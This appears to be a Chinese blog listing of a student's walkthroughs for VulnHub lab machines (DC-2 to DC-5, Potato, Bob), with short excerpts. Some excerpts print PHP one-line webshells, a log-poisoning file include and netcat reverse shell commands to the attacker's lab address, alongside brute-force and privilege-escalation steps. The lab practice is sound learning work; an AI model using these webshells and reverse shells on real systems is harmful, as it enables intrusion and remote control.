网络安全靶机渗透
文章平均质量分 70
Zhao蔫儿
哈工程计算机硕士研二在读、网安初学者爱好者
展开
-
DC-5靶机渗透简命令汇总
在url中植入一句话木马,可执行外部命令,并显示原始输出<?php passthru($_GET['abc']); ?>[GET /thankyou.php?<?php eval($_REQUEST[123]); ?> HTTP/1.1]【GET /thankyou.php?file=/var/log/nginx/error.log HTTP/1.1】[nc -e /bin/bash 192.168.160.129 1234]nc -lvvp 123gcc -fP原创 2021-09-30 00:19:34 · 130 阅读 · 0 评论 -
Dc-4靶机渗透----burpsuite抓包与爆破、hydra、sudo、teehee提权、/etc/passwd的使用
nmap扫描,扫描出80端口和ssh端口先访问http服务。再用whatweb和dirb扫描该网站,发现既没有cms有没有相关的文件可以查看那我们只能抓包爆破,或者海德拉爆破,账号其实有提示了大概就是admin,只需破解password即可爆破得到admin:happy登录继续执行命令抓包修改radio的值使用ncnc 192.168.160.129 777 -e /bin/bash改成nc+192.168.160.129+777+-e+/b...原创 2021-09-27 23:58:47 · 594 阅读 · 0 评论 -
DC-3 渗透实战---sql注入、反弹shell、Ubuntu16.04double-fdput()提权
扫描靶机Ip根据靶机Mac确定靶机ip地址为nmap -sP 192.168.160.0/24或netdiscover -r 192.168.160.0/24确定ip地址为192.168.160.141nmap 192.168.160.141 -sV -p- -A发现80端口,和开源内容管理系统 joomla连接http://192.168.160.141joomscan --url http://192.168.160.141发现joomla...原创 2021-09-26 11:20:46 · 747 阅读 · 0 评论 -
DC-2 靶机实战------rbash绕过、git提权、WPScan的使用
安装DC-2网卡开启NAT模式开始攻击攻击机kali (192.168.160.0/24)使用wpscan、cewl、hydra、dirb、nmap等工具信息搜集nmap -sP 192.168.160.0/24确定DC-2 IP 192.168.160.140扫描具体开放的端口nmap -sV 192.168.160.140 -p- -A 得知SSH开放和http开放,访问http://192.168.160.140发现ip重定向有问题需.原创 2021-09-25 00:28:58 · 320 阅读 · 0 评论 -
PotatoSunscr靶机渗透攻略 ----------hydra暴力破解实战训练
准备工作靶机下载https://www.vulnhub.com/entry/potato-suncsr-1,556/可用迅雷下载,也可以点第二个直接下载下载后添加至虚拟机,设置网卡为NAT模式攻击机:kali虚拟机 网卡为NAT模式 ip地址为192.168.160.129开始攻击扫描当前网段下存活主机nmap -sV 192.168.160.0/24或者arp-scan -l 可确定靶机IP为192.168.160.13...原创 2021-09-21 13:53:02 · 854 阅读 · 0 评论 -
BOB靶机渗透实战-----攻略(大神勿喷)
准备工作靶场Bob: 1.0.1 ~ VulnHub攻击工具kali虚拟机直接双击打开即可添加到虚拟机。打开后网卡使用NAT模式。没有给用户名和密码。(给了就没有攻击的必要了 hhh)开始攻击打开kali使用nmap 扫描同网段下的ip和端口(因为靶机也用的NAT模式的网卡,所以按理说应该被分在了与kali虚拟机同网段的某一个ip地址)我的kali ip 地址为192.168.160.129nmap -sP 192.168.160.0/24...原创 2021-09-21 01:55:37 · 2044 阅读 · 4 评论